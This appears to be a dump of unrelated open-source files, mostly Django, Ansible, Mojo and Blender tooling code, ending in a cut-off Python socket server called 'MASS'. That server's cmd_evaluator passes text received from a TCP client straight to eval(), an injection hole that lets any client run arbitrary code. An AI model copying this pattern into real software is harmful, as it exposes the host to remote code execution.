from django.contrib.auth.models import AbstractBaseUser, PermissionsMixin
from django.contrib.auth.tests.custom_user import (
CustomUserManager, RemoveGroupsAndPermissions,
)
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
class CustomPermissionsUserManager(CustomUserManager):
def create_superuser(self, email, password, date_of_birth):
u = self.create_user(email, password=password, date_of_birth=date_of_birth)
u.is_superuser = True
u.save(using=self._db)
return u
with RemoveGroupsAndPermissions():
@python_2_unicode_compatible
class CustomPermissionsUser(AbstractBaseUser, PermissionsMixin):
email = models.EmailField(verbose_name='email address', max_length=255, unique=True)
date_of_birth = models.DateField()
custom_objects = CustomPermissionsUserManager()
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = ['date_of_birth']
class Meta:
app_label = 'auth'
def get_full_name(self):
return self.email
def get_short_name(self):
return self.email
def __str__(self):
return self.email
| bsd-3-clause |
mukgupta/django-fast-deploy | fab_deploy_tests/test_project3/test_project3/wsgi.py | 1 | 1148 | """
WSGI config for test_project3 project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "test_project3.settings")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
| bsd-3-clause |
tgsd96/gargnotes | venv/lib/python2.7/site-packages/django/conf/locale/cy/formats.py | 160 | 1822 | # -*- encoding: utf-8 -*-
# This file is distributed under the same license as the Django package.
#
from __future__ import unicode_literals
# The *_FORMAT strings use the Django date format syntax,
# see http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
DATE_FORMAT = 'j F Y' # '25 Hydref 2006'
TIME_FORMAT = 'P' # '2:30 y.b.'
DATETIME_FORMAT = 'j F Y, P' # '25 Hydref 2006, 2:30 y.b.'
YEAR_MONTH_FORMAT = 'F Y' # 'Hydref 2006'
MONTH_DAY_FORMAT = 'j F' # '25 Hydref'
SHORT_DATE_FORMAT = 'd/m/Y' # '25/10/2006'
SHORT_DATETIME_FORMAT = 'd/m/Y P' # '25/10/2006 2:30 y.b.'
FIRST_DAY_OF_WEEK = 1 # 'Dydd Llun'
# The *_INPUT_FORMATS strings use the Python strftime format syntax,
# see http://docs.python.org/library/datetime.html#strftime-strptime-behavior
DATE_INPUT_FORMATS = (
'%d/%m/%Y', '%d/%m/%y', # '25/10/2006', '25/10/06'
)
DATETIME_INPUT_FORMATS = (
'%Y-%m-%d %H:%M:%S', # '2006-10-25 14:30:59'
'%Y-%m-%d %H:%M:%S.%f', # '2006-10-25 14:30:59.000200'
'%Y-%m-%d %H:%M', # '2006-10-25 14:30'
'%Y-%m-%d', # '2006-10-25'
'%d/%m/%Y %H:%M:%S', # '25/10/2006 14:30:59'
'%d/%m/%Y %H:%M:%S.%f', # '25/10/2006 14:30:59.000200'
'%d/%m/%Y %H:%M', # '25/10/2006 14:30'
'%d/%m/%Y', # '25/10/2006'
'%d/%m/%y %H:%M:%S', # '25/10/06 14:30:59'
'%d/%m/%y %H:%M:%S.%f', # '25/10/06 14:30:59.000200'
'%d/%m/%y %H:%M', # '25/10/06 14:30'
'%d/%m/%y', # '25/10/06'
)
DECIMAL_SEPARATOR = '.'
THOUSAND_SEPARATOR = ','
NUMBER_GROUPING = 3
| mit |
luken/SpockBot | spockbot/plugins/helpers/movement.py | 2 | 2851 | """
MovementPlugin provides a centralized plugin for controlling client
movement so the client doesn't try to pull itself in a dozen
directions.
"""
from spockbot.plugins.base import PluginBase, pl_announce
from spockbot.plugins.tools.event import EVENT_UNREGISTER
from spockbot.vector import Vector3
class MovementCore(object):
def __init__(self, plug):
self.__plug = plug
self.move_to = plug.new_path
def stop(self):
self.__plug.path_nodes = None
@property
def is_moving(self):
return self.__plug.path_nodes is not None
@property
def current_path(self):
return self.__plug.path_nodes
@property
def current_target(self):
p = self.current_path
return p[0] if p else None
@property
def final_target(self):
p = self.current_path
return p[len(p)-1] if p else None
@pl_announce('Movement')
class MovementPlugin(PluginBase):
requires = ('ClientInfo', 'Event', 'Net', 'Pathfinding', 'Physics')
events = {
'client_tick': 'client_tick',
'client_position_update': 'handle_position_update',
'client_join_game': 'handle_join_game',
}
def __init__(self, ploader, settings):
super(MovementPlugin, self).__init__(ploader, settings)
self.flag_pos_reset = False
self.movement = MovementCore(self)
self.connected_to_server = False
ploader.provides('Movement', self.movement)
self.path_nodes = None
def client_tick(self, name, data):
if not self.connected_to_server:
return
self.net.push_packet('PLAY>Player Position and Look',
self.clientinfo.position.get_dict())
if self.flag_pos_reset:
self.event.emit('movement_position_reset')
self.flag_pos_reset = False
def handle_join_game(self, name, data):
self.connected_to_server = True
def handle_position_update(self, name, data):
self.flag_pos_reset = True
def new_path(self, *xyz):
target = Vector3(*xyz)
self.pathfinding.pathfind(
self.clientinfo.position, target, self.path_cb
)
def path_cb(self, result):
self.path_nodes = result
self.event.emit('movement_path_done')
self.event.reg_event_handler('action_tick', self.follow_path)
def follow_path(self, _, __):
if not self.path_nodes:
self.movement.stop()
return EVENT_UNREGISTER
target = self.path_nodes[0]
jumped = False
if target.is_jump and self.clientinfo.position.on_ground:
self.physics.jump()
jumped = True
if self.physics.move_target(target) or jumped:
self.path_nodes.popleft()
if not self.path_nodes:
self.movement.stop()
| mit |
aagusti/i-sipkd | setup.py | 1 | 1775 | import os
import sys
import subprocess
from setuptools import setup, find_packages
here = os.path.abspath(os.path.dirname(__file__))
README = open(os.path.join(here, 'README.txt')).read()
CHANGES = open(os.path.join(here, 'CHANGES.txt')).read()
requires=['pyramid>=1.5a2',
'SQLAlchemy',
'transaction',
'pyramid_tm',
'pyramid_debugtoolbar',
'zope.sqlalchemy',
'waitress',
'ziggurat-foundations',
'colander',
'deform>=2.0a2',
'pyramid_chameleon',
'psycopg2',
'alembic>=0.3.4',
'pyramid_beaker',
'pytz',
]
if sys.argv[1:] and sys.argv[1] == 'develop-use-pip':
bin_ = os.path.split(sys.executable)[0]
pip = os.path.join(bin_, 'pip')
for package in requires:
cmd = [pip, 'install', package]
subprocess.call(cmd)
cmd = [sys.executable, sys.argv[0], 'develop']
subprocess.call(cmd)
sys.exit()
setup(name='esipkd',
version='0.0',
description='esipkd',
long_description=README + '\n\n' + CHANGES,
classifiers=[
"Programming Language :: Python",
"Framework :: Pylons",
"Topic :: Internet :: WWW/HTTP",
"Topic :: Internet :: WWW/HTTP :: WSGI :: Application",
],
author='',
author_email='',
url='',
keywords='web pyramid pylons',
packages=find_packages(),
include_package_data=True,
zip_safe=False,
install_requires=requires,
tests_require=requires,
test_suite="esipkd",
entry_points = """\
[paste.app_factory]
main = esipkd:main
[console_scripts]
initialize_esipkd_db = esipkd.scripts.initializedb:main
""",
)
| lgpl-3.0 |
afandria/mojo | mojo/python/tests/bindings_constants_unittest.py | 10 | 1458 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import math
import unittest
# Generated files
# pylint: disable=F0401
import sample_service_mojom
import test_constants_mojom
class ConstantBindingsTest(unittest.TestCase):
def testConstantGeneration(self):
self.assertEquals(test_constants_mojom.INT8_VALUE, -2)
self.assertEquals(test_constants_mojom.UINT64_VALUE, 9999999999999999999)
self.assertEquals(test_constants_mojom.DOUBLE_INFINITY,
float('inf'))
self.assertEquals(test_constants_mojom.DOUBLE_NEGATIVE_INFINITY,
float('-inf'))
self.assertTrue(math.isnan(test_constants_mojom.DOUBLE_NA_N))
self.assertEquals(test_constants_mojom.FLOAT_INFINITY,
float('inf'))
self.assertEquals(test_constants_mojom.FLOAT_NEGATIVE_INFINITY,
float('-inf'))
self.assertTrue(math.isnan(test_constants_mojom.FLOAT_NA_N))
def testConstantOnStructGeneration(self):
self.assertEquals(test_constants_mojom.StructWithConstants.INT8_VALUE, 5)
def testStructImmutability(self):
with self.assertRaises(AttributeError):
sample_service_mojom.Foo.FOOBY = 0
with self.assertRaises(AttributeError):
del sample_service_mojom.Foo.FOOBY
with self.assertRaises(AttributeError):
sample_service_mojom.Foo.BAR = 1
| bsd-3-clause |
gptech/ansible | lib/ansible/plugins/action/nxos.py | 14 | 6174 | #
# (c) 2016 Red Hat Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import sys
import copy
from ansible.plugins.action.normal import ActionModule as _ActionModule
from ansible.utils.path import unfrackpath
from ansible.plugins import connection_loader
from ansible.module_utils.basic import AnsibleFallbackNotFound
from ansible.module_utils.nxos import nxos_argument_spec
from ansible.module_utils.six import iteritems
from ansible.module_utils._text import to_bytes
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
class ActionModule(_ActionModule):
def run(self, tmp=None, task_vars=None):
if self._play_context.connection != 'local':
return dict(
failed=True,
msg='invalid connection specified, expected connection=local, '
'got %s' % self._play_context.connection
)
provider = self.load_provider()
transport = provider['transport'] or 'cli'
display.vvvv('connection transport is %s' % transport, self._play_context.remote_addr)
if transport == 'cli':
pc = copy.deepcopy(self._play_context)
pc.connection = 'network_cli'
pc.network_os = 'nxos'
pc.remote_addr = provider['host'] or self._play_context.remote_addr
pc.port = provider['port'] or self._play_context.port or 22
pc.remote_user = provider['username'] or self._play_context.connection_user
pc.password = provider['password'] or self._play_context.password
pc.private_key_file = provider['ssh_keyfile'] or self._play_context.private_key_file
pc.timeout = provider['timeout'] or self._play_context.timeout
display.vvv('using connection plugin %s' % pc.connection, pc.remote_addr)
connection = self._shared_loader_obj.connection_loader.get('persistent', pc, sys.stdin)
socket_path = self._get_socket_path(pc)
display.vvvv('socket_path: %s' % socket_path, pc.remote_addr)
if not os.path.exists(socket_path):
# start the connection if it isn't started
rc, out, err = connection.exec_command('open_shell()')
display.vvvv('open_shell() returned %s %s %s' % (rc, out, err))
if rc != 0:
return {'failed': True,
'msg': 'unable to open shell. Please see: '
+ 'https://docs.ansible.com/ansible/network_debug_troubleshooting.html#unable-to-open-shell',
'rc': rc}
else:
# make sure we are in the right cli context which should be
# enable mode and not config module
rc, out, err = connection.exec_command('prompt()')
while str(out).strip().endswith(')#'):
display.vvvv('wrong context, sending exit to device', self._play_context.remote_addr)
connection.exec_command('exit')
rc, out, err = connection.exec_command('prompt()')
task_vars['ansible_socket'] = socket_path
else:
provider['transport'] = 'nxapi'
if provider.get('host') is None:
provider['host'] = self._play_context.remote_addr
if provider.get('port') is None:
provider['port'] = 80
if provider.get('timeout') is None:
provider['timeout'] = self._play_context.timeout
if provider.get('username') is None:
provider['username'] = self._play_context.connection_user
if provider.get('password') is None:
provider['password'] = self._play_context.password
if provider.get('use_ssl') is None:
provider['use_ssl'] = False
if provider.get('validate_certs') is None:
provider['validate_certs'] = True
self._task.args['provider'] = provider
# make sure a transport value is set in args
self._task.args['transport'] = transport
result = super(ActionModule, self).run(tmp, task_vars)
return result
def _get_socket_path(self, play_context):
ssh = connection_loader.get('ssh', class_only=True)
cp = ssh._create_control_path(play_context.remote_addr, play_context.port, play_context.remote_user)
path = unfrackpath("$HOME/.ansible/pc")
return cp % dict(directory=path)
def load_provider(self):
provider = self._task.args.get('provider', {})
for key, value in iteritems(nxos_argument_spec):
if key != 'provider' and key not in provider:
if key in self._task.args:
provider[key] = self._task.args[key]
elif 'fallback' in value:
provider[key] = self._fallback(value['fallback'])
elif key not in provider:
provider[key] = None
return provider
def _fallback(self, fallback):
strategy = fallback[0]
args = []
kwargs = {}
for item in fallback[1:]:
if isinstance(item, dict):
kwargs = item
else:
args = item
try:
return strategy(*args, **kwargs)
except AnsibleFallbackNotFound:
pass
| gpl-3.0 |
vatlab/SOS | test/check_zombie.py | 2 | 1533 | import sys
import subprocess
import psutil
def run_process(args):
proc_before = subprocess.check_output(
'ps aux | grep -v root', shell=True).decode().splitlines()
# run the main process
ret = subprocess.Popen(args)
ret.wait()
proc_after = subprocess.check_output(
'ps aux | grep -v root', shell=True).decode().splitlines()
pid_before = [
int(x.split()[1]) for x in proc_before if not 'PID' in x and 'TIME' in x
]
pid_after = [
int(x.split()[1]) for x in proc_after if not 'PID' in x and 'TIME' in x
]
possible_zombies = [name for pid,name in zip(pid_after, proc_after) if pid not in pid_before and \
psutil.Process(pid).ppid() not in pid_before]
if possible_zombies:
sys.exit('\nNew possible zoombie processes\n{zombies}')
else:
print('\nNo possible zombie process is detected')
sys.exit(ret.returncode)
if __name__ == '__main__':
if '-h' in sys.argv:
print('Usage: python check_zombie.py regular command line')
print(
'''This command executes the command and lists new processes after the completion of '''
)
print(
'''the command. Processes that are child processes of processes before execution are '''
)
print(
'''excluded. The rest of the processes could be zombie process left by the command, or '''
)
print('''new processes created during the execution of the command.''')
run_process(sys.argv[1:])
| gpl-3.0 |
LiXizhi/NPLRuntime | Client/trunk/externals/bullet3/Extras/Serialize/HeaderGenerator/blenderGenerate.py | 49 | 2903 | import dump
header = """/* Copyright (C) 2006 Charlie C
*
* This software is provided 'as-is', without any express or implied
* warranty. In no event will the authors be held liable for any damages
* arising from the use of this software.
*
* Permission is granted to anyone to use this software for any purpose,
* including commercial applications, and to alter it and redistribute it
* freely, subject to the following restrictions:
*
* 1. The origin of this software must not be misrepresented; you must not
* claim that you wrote the original software. If you use this software
* in a product, an acknowledgment in the product documentation would be
* appreciated but is not required.
* 2. Altered source versions must be plainly marked as such, and must not be
* misrepresented as being the original software.
* 3. This notice may not be removed or altered from any source distribution.
*/
// Auto generated from makesdna dna.c
"""
dtList = dump.DataTypeList
out = "../BlenderSerialize/autogenerated/"
spaces = 4
def addSpaces(file, space):
for i in range(0, space):
file.write(" ")
def write(file, spaces, string):
addSpaces(file, spaces)
file.write(string)
###################################################################################
blender = open(out+"blender.h", 'w')
blender.write(header)
blender.write("#ifndef __BLENDER_H__\n")
blender.write("#define __BLENDER_H__\n")
for dt in dtList:
blender.write("#include \"%s.h\"\n"%dt.filename)
blender.write("#endif//__BLENDER_H__")
blender.close()
###################################################################################
blenderC = open(out+"blender_Common.h", 'w')
blenderC.write(header)
blenderC.write("#ifndef __BLENDERCOMMON_H__\n")
blenderC.write("#define __BLENDERCOMMON_H__\n")
strUnRes = """
// put an empty struct in the case
typedef struct bInvalidHandle {
int unused;
}bInvalidHandle;
"""
blenderC.write(strUnRes)
blenderC.write("namespace Blender {\n")
for dt in dtList:
write(blenderC, 4, "class %s;\n"%dt.name)
blenderC.write("}\n")
blenderC.write("#endif//__BLENDERCOMMON_H__")
blenderC.close()
for dt in dtList:
fp = open(out+dt.filename+".h", 'w')
fp.write(header)
strUpper = dt.filename.upper()
fp.write("#ifndef __%s__H__\n"%strUpper)
fp.write("#define __%s__H__\n"%strUpper)
fp.write("\n\n")
fp.write("// -------------------------------------------------- //\n")
fp.write("#include \"blender_Common.h\"\n")
for i in dt.includes:
fp.write("#include \"%s\"\n"%i)
fp.write("\nnamespace Blender {\n")
fp.write("\n\n")
addSpaces(fp,4)
fp.write("// ---------------------------------------------- //\n")
write(fp, 4, "class %s\n"%dt.name)
write(fp, 4, "{\n")
write(fp, 4, "public:\n")
for i in dt.dataTypes:
write(fp, 8, i+";\n")
write(fp, 4, "};\n")
fp.write("}\n")
fp.write("\n\n")
fp.write("#endif//__%s__H__\n"%strUpper)
fp.close()
| gpl-2.0 |
liqi328/rjrepaircompany | djangotoolbox/db/base.py | 46 | 3591 | import datetime
from django.db.backends import BaseDatabaseFeatures, BaseDatabaseOperations, \
BaseDatabaseWrapper, BaseDatabaseClient, BaseDatabaseValidation, \
BaseDatabaseIntrospection
from .creation import NonrelDatabaseCreation
class NonrelDatabaseFeatures(BaseDatabaseFeatures):
can_return_id_from_insert = True
supports_unspecified_pk = False
supports_regex_backreferencing = True
supports_date_lookup_using_string = False
supports_timezones = False
supports_joins = False
distinguishes_insert_from_update = False
supports_select_related = False
supports_deleting_related_objects = False
string_based_auto_field = False
supports_dicts = False
def _supports_transactions(self):
return False
class NonrelDatabaseOperations(BaseDatabaseOperations):
def __init__(self, connection):
self.connection = connection
super(NonrelDatabaseOperations, self).__init__()
def quote_name(self, name):
return name
def value_to_db_date(self, value):
# value is a date here, no need to check it
return value
def value_to_db_datetime(self, value):
# value is a datetime here, no need to check it
return value
def value_to_db_time(self, value):
# value is a time here, no need to check it
return value
def prep_for_like_query(self, value):
return value
def prep_for_iexact_query(self, value):
return value
def check_aggregate_support(self, aggregate):
from django.db.models.sql.aggregates import Count
if not isinstance(aggregate, Count):
raise NotImplementedError("This database does not support %r "
"aggregates" % type(aggregate))
def year_lookup_bounds(self, value):
return [datetime.datetime(value, 1, 1, 0, 0, 0, 0),
datetime.datetime(value+1, 1, 1, 0, 0, 0, 0)]
def pk_default_value(self):
return None
def value_to_db_auto(self, value):
"""
Transform a value to an object compatible with the AutoField required
by the backend driver for auto columns.
"""
if self.connection.features.string_based_auto_field:
if value is None:
return None
return unicode(value)
return super(NonrelDatabaseOperations, self).value_to_db_auto(value)
class NonrelDatabaseClient(BaseDatabaseClient):
pass
class NonrelDatabaseValidation(BaseDatabaseValidation):
pass
class NonrelDatabaseIntrospection(BaseDatabaseIntrospection):
def table_names(self):
"""Returns a list of names of all tables that exist in the database."""
return self.django_table_names()
class FakeCursor(object):
def __getattribute__(self, name):
raise NotImplementedError('Cursors not supported')
def __setattr__(self, name, value):
raise NotImplementedError('Cursors not supported')
class NonrelDatabaseWrapper(BaseDatabaseWrapper):
# These fake operators are required for SQLQuery.as_sql() support.
operators = {
'exact': '= %s',
'iexact': '= UPPER(%s)',
'contains': 'LIKE %s',
'icontains': 'LIKE UPPER(%s)',
'regex': '~ %s',
'iregex': '~* %s',
'gt': '> %s',
'gte': '>= %s',
'lt': '< %s',
'lte': '<= %s',
'startswith': 'LIKE %s',
'endswith': 'LIKE %s',
'istartswith': 'LIKE UPPER(%s)',
'iendswith': 'LIKE UPPER(%s)',
}
def _cursor(self):
return FakeCursor()
| bsd-3-clause |
wuga214/Django-Wuga | env/lib/python2.7/site-packages/django/template/loaders/cached.py | 120 | 7116 | """
Wrapper class that takes a list of template loaders as an argument and attempts
to load templates from them in order, caching the result.
"""
import hashlib
import warnings
from django.template import Origin, Template, TemplateDoesNotExist
from django.template.backends.django import copy_exception
from django.utils.deprecation import RemovedInDjango20Warning
from django.utils.encoding import force_bytes, force_text
from django.utils.inspect import func_supports_parameter
from .base import Loader as BaseLoader
class Loader(BaseLoader):
def __init__(self, engine, loaders):
self.template_cache = {}
self.find_template_cache = {} # RemovedInDjango20Warning
self.get_template_cache = {}
self.loaders = engine.get_template_loaders(loaders)
super(Loader, self).__init__(engine)
def get_contents(self, origin):
return origin.loader.get_contents(origin)
def get_template(self, template_name, template_dirs=None, skip=None):
"""
Perform the caching that gives this loader its name. Often many of the
templates attempted will be missing, so memory use is of concern here.
To keep it in check, caching behavior is a little complicated when a
template is not found. See ticket #26306 for more details.
With template debugging disabled, cache the TemplateDoesNotExist class
for every missing template and raise a new instance of it after
fetching it from the cache.
With template debugging enabled, a unique TemplateDoesNotExist object
is cached for each missing template to preserve debug data. When
raising an exception, Python sets __traceback__, __context__, and
__cause__ attributes on it. Those attributes can contain references to
all sorts of objects up the call chain and caching them creates a
memory leak. Thus, unraised copies of the exceptions are cached and
copies of those copies are raised after they're fetched from the cache.
"""
key = self.cache_key(template_name, template_dirs, skip)
cached = self.get_template_cache.get(key)
if cached:
if isinstance(cached, type) and issubclass(cached, TemplateDoesNotExist):
raise cached(template_name)
elif isinstance(cached, TemplateDoesNotExist):
raise copy_exception(cached)
return cached
try:
template = super(Loader, self).get_template(
template_name, template_dirs, skip,
)
except TemplateDoesNotExist as e:
self.get_template_cache[key] = copy_exception(e) if self.engine.debug else TemplateDoesNotExist
raise
else:
self.get_template_cache[key] = template
return template
def get_template_sources(self, template_name, template_dirs=None):
for loader in self.loaders:
args = [template_name]
# RemovedInDjango20Warning: Add template_dirs for compatibility
# with old loaders
if func_supports_parameter(loader.get_template_sources, 'template_dirs'):
args.append(template_dirs)
for origin in loader.get_template_sources(*args):
yield origin
def cache_key(self, template_name, template_dirs, skip=None):
"""
Generate a cache key for the template name, dirs, and skip.
If skip is provided, only origins that match template_name are included
in the cache key. This ensures each template is only parsed and cached
once if contained in different extend chains like:
x -> a -> a
y -> a -> a
z -> a -> a
"""
dirs_prefix = ''
skip_prefix = ''
if skip:
matching = [origin.name for origin in skip if origin.template_name == template_name]
if matching:
skip_prefix = self.generate_hash(matching)
if template_dirs:
dirs_prefix = self.generate_hash(template_dirs)
return '-'.join(filter(bool, [force_text(template_name), skip_prefix, dirs_prefix]))
def generate_hash(self, values):
return hashlib.sha1(force_bytes('|'.join(values))).hexdigest()
@property
def supports_recursion(self):
"""
RemovedInDjango20Warning: This is an internal property used by the
ExtendsNode during the deprecation of non-recursive loaders.
"""
return all(hasattr(loader, 'get_contents') for loader in self.loaders)
def find_template(self, name, dirs=None):
"""
RemovedInDjango20Warning: An internal method to lookup the template
name in all the configured loaders.
"""
key = self.cache_key(name, dirs)
try:
result = self.find_template_cache[key]
except KeyError:
result = None
for loader in self.loaders:
try:
template, display_name = loader(name, dirs)
except TemplateDoesNotExist:
pass
else:
origin = Origin(
name=display_name,
template_name=name,
loader=loader,
)
result = template, origin
break
self.find_template_cache[key] = result
if result:
return result
else:
self.template_cache[key] = TemplateDoesNotExist
raise TemplateDoesNotExist(name)
def load_template(self, template_name, template_dirs=None):
warnings.warn(
'The load_template() method is deprecated. Use get_template() '
'instead.', RemovedInDjango20Warning,
)
key = self.cache_key(template_name, template_dirs)
template_tuple = self.template_cache.get(key)
# A cached previous failure:
if template_tuple is TemplateDoesNotExist:
raise TemplateDoesNotExist(template_name)
elif template_tuple is None:
template, origin = self.find_template(template_name, template_dirs)
if not hasattr(template, 'render'):
try:
template = Template(template, origin, template_name, self.engine)
except TemplateDoesNotExist:
# If compiling the template we found raises TemplateDoesNotExist,
# back off to returning the source and display name for the template
# we were asked to load. This allows for correct identification (later)
# of the actual template that does not exist.
self.template_cache[key] = (template, origin)
self.template_cache[key] = (template, None)
return self.template_cache[key]
def reset(self):
"Empty the template cache."
self.template_cache.clear()
self.find_template_cache.clear() # RemovedInDjango20Warning
self.get_template_cache.clear()
| apache-2.0 |
niwtr/map-walker | src/server/transmitter.py | 1 | 15362 | #! /usr/bin/python
# -*- coding: utf-8 -*-
'''
Current version : 0.4
2016-5-25
by Heranort
'''
import threading #for thread creation
import socket #socket offical module
import time #time official module
import os #for fortune!
from mailer import mail
from mailer import mailbox
import platform #judge the platform
import sys
from mass_plists import M_A_S_S_PLIST #property list for MASSES
from mass_plists import DISPATCH_PLIST
from log import log_file #log object
'''
################################################################################
M_A_S_S
Modularized Abstract Socket Server (MASS) for TCP linking, and server environment
Authorized by Herathol Nortzor
First published: 2016-3-10
################################################################################
'''
'''
################################################################################
Modularized Abstract Socket Server class.
This is an abstraction of an instant-to-use socket server. Needs a property list
to configure and consumes a finite state machine, or cyclic procedure for inner
running machine. When a MASS was instantialized, it creates an abstract server
but doesn't make any bind to the socket. And when the function start() was
called, the MASS would bind to the socket instantly and start working with the
state machine attached. The goal of this is to create an easy-to-use abstrac-
tion of socket server.
In fact, the REAL MASS would not exist. Each version of MASS is adapted to the
actual use, so does this one.
Happy hacking with the M_A_S_S!
################################################################################
'''
def print(*c, end=''):log_file.info(*c)
def prinw(*c, end=''):log_file.warn(*c)
class M_A_S_S():
plist=[]
sock=[] #the actual socket binding
address=[] #ip address bingding. generated below.
com=9999 #com for the socket
machine=print #algorithm machine or procedure
speed=0.5 #the duration for the machine to idle
sock_thread=threading.Thread()
timer=0
'''
Initialize the M_A_S_S, needs a property list and a machine.
The property list is designed for this actual scenery, it would look like this:
{
'name' : 'SERVER',
'welcome' : 'Enjoy working with MASS.',
'com' : 9999,
'speed' : 0.5
}
It is in fact a dictionary of Python.
Machine: an algorithm machine, which governs the receive-send cycle and
inner-function algorithm.
'''
def __init__(self,plist,machine):
self.plist=plist
self.server_name=plist['name']
self.server_welcome_string=plist['welcome']
self.address="127.0.0.1" #socket.gethostbyname(socket.gethostname())
self.com=plist['com']
self.speed=plist['speed']
self.time_out=plist['time']
self.machine=machine
'''
Procedure for managing the initialization and sweeping of algorithm machine.
It is the entry for the inner algorithm machine.
addr: the address of the connection.
'''
def linque_fn (self, sock, addr):
print(self.server_name+':'+'Accept new connection from %s:%s...' % addr)
print(self.server_name+" bounded to MASS "+str(self))
sock.send(b'established') #connection acknowledge.
self.machine(self)
print (self.server_name+':'+'connection from %s:%s closed.' % addr)
'''
Bind the MASS to actual ip & com. The server should make sure the com is not
in use.
When a MASS is ready, a message of 'waiting for connection' should appear on
the screen.
ip_addr: ip address.
com: com.
'''
def sock_tcp_establish(self, ip_addr, com):
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(self.time_out)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
#handle the error that "address is used."
s.bind((ip_addr,com)) #bind socket to this.
s.listen(5)
print (self.server_name+':'+'waiting for connection...')
return s
'''
Send words to the client.
The words must be in type of string.
sock: the socket to send to.
string: the words to be sent.
'''
def speak_to_client(self, string):
estring=string.encode('utf-8')
try:
self.sock.send(estring)
except BrokenPipeError as err:
prinw(self.server_name+': '+"Encounter BROKENPIPE!")
self.sock.close()
self.sock_thread._delete()
def unbound_server(self):
self.sock.close()
'''
Start the server process!
When this function is called, the MASS is about to be put into actual use.
The inner function linque_fn would handle the inner algorithm.
Leave the socket work till an assignment is over.
'''
def start(self):
if not self.sock_thread.isAlive():
s=self.sock_tcp_establish(self.address, self.com)
try:
sock,addr=s.accept()
self.sock=sock
self.sock_thread=threading.Thread(target=self.linque_fn,args=(sock, addr),name='Server'+str(self.com))
self.sock_thread.start() #blocked till connection establishs
except socket.timeout:
prinw(self.server_name+': '+"Connection timeout, unbound.")
'''
################################################################################
Class definition of the packet transmitted between core module and transmitter.
We have to define such packet because we have to mark which MASS server is
sending msgs and which MASS server should the reply mail be sent to .
Thus this class wraps:
1. the MASS binding for current server.
2. the request command, namely, the req.
3. the argument list, yeah it indeed is a tuple.
The request command can be interpreted by the interpreter in core module, and the
argument tuple can be applied to the function interpreted.
################################################################################
'''
class transmitter_packet():
def __init__(self,MASS,func,args):
self.MASS=MASS
self.MASS_NAME=self.MASS.server_name
self.func=func
self.args=args
self.pipe=MASS.speak_to_client
def eval_func(self):
return self.func(*self.args)
'''
################################################################################
Runtime environment of the transmission. The playground for MASSES.
env: A list of environment variables.
cmail: The core mailbox.
core_mail_binding: Pipe for communicating with core module.
MASSES: A list of MASSES.
################################################################################
'''
class transmit_env():
current_idling_com = []
'''
Connect the core pipe into this module and initialize the environment itself.
Create the MASSES.
tmail: the mailbox owned by transmitter itself.
cmail: mailbox of the core module.
env: left empty currently.
'''
def __init__(self,core_mail, interpreter):
self.tmail=mailbox('transmitter',50)
self.cmail=core_mail
self.interpreter=interpreter
self.env=[]
self.dispatcher_MASS=[]
self.init_dispatcher_MASS()
self.MASSES=[]
self.MASSN=1
for pl in M_A_S_S_PLIST:
self.MASSES.append(M_A_S_S(pl,self.machine))
def init_dispatcher_MASS(self):
self.dispatcher_MASS=M_A_S_S(DISPATCH_PLIST,self.com_dispatcher_machine)
'''
used in the tcp_server as message handler.
interprete the command received by TCP/IP transmission.
translate the command into list of messages
the messages would then sent to the **core** module
which would then handle that.
cmd: commands received as string.
MASS: the MASS on current work.
In fact this is a message parser. it parses the message fetched from the
client and parse its structure.
For example the command
mtp::[1,[2,3,4]]
can be parsed into <request_command>:=mtp,
<argument_list> :=[1,[2,3,4]]
trace::[99199,[1,[2,3,4]]]
can be parsed into <request_command>:=trace,
<augument_list> :=[99199, [1,[2,3,4]]], where
current time:=99199
path_list:=[1,[2,3,4]]
the server should resend the coordinate.
'''
def cmd_evaluator(self,cmd,MASS):
cmd=cmd.split('::') #seperate the command by double-colons
command=cmd[0] #the first element should be command.
if(len(cmd)<2):
pkt=transmitter_packet(MASS, self.interpreter(command), ())
return pkt
else:
try:
args=tuple(eval(cmd[1])) #the argument list, tupled
pkt=transmitter_packet(MASS,self.interpreter(command),args) #pack up the message.
except:
pkt=transmitter_packet(MASS, self.interpreter("err"), cmd)
finally:
return pkt
def shutdown_MASS(self, com):
isFound=False
for mass in self.MASSES:
if mass.com==com:
if mass.sock_thread.isAlive():
mass.unbound_server()
self.init_dispatcher_MASS()
isFound=True
return isFound
'''
Algorithm machine. Controls how the MASS works.
Consumes the env and the MASS.
The MASS can be distributive but the mailer is unique to the env, so the
machine must have connection to the environment itself.
MASS: the current working MASS
'''
def machine(self,MASS):
'''
Wait for the core module to reply.
Check for each mails in the mail list
Return only on condition the mail toward current MASS was found.
Remind that a transmitter environment can contain lots of MASSES
and searching for the reply to a certain MASS is required
because each MASS contains its own machine.
The uniqueness is asured by the MASS itself. That for each MASS,
the function 'MASS.speak_to_client' is unique.
That is the signiture for any of the MASS servers.
For example:
class foo():
